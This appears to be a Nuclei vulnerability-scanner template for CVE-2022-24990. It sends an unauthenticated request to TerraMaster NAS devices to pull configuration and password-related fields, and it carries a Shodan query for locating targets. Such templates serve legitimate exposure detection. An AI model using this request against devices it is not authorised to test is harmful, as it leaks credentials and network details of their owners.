49 lines
1.4 KiB
YAML
49 lines
1.4 KiB
YAML
id: CVE-2022-24990
|
|
|
|
info:
|
|
name: TerraMaster TOS < 4.2.30 Server Information Disclosure
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure.
|
|
reference:
|
|
- https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
|
|
- https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=33732
|
|
- https://forum.terra-master.com/en/viewforum.php?f=28
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-24990
|
|
metadata:
|
|
shodan-query: TerraMaster
|
|
tags: cve,cve2022,terramaster,exposure,kev
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/module/api.php?mobile/webNasIPS"
|
|
headers:
|
|
User-Agent: "TNAS"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
- "TerraMaster"
|
|
condition: and
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "webNasIPS successful"
|
|
- "(ADDR|(IFC|PWD|[DS]AT)):"
|
|
- "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick
|
|
condition: or
|
|
|
|
# Enhanced by mp on 2022/03/23
|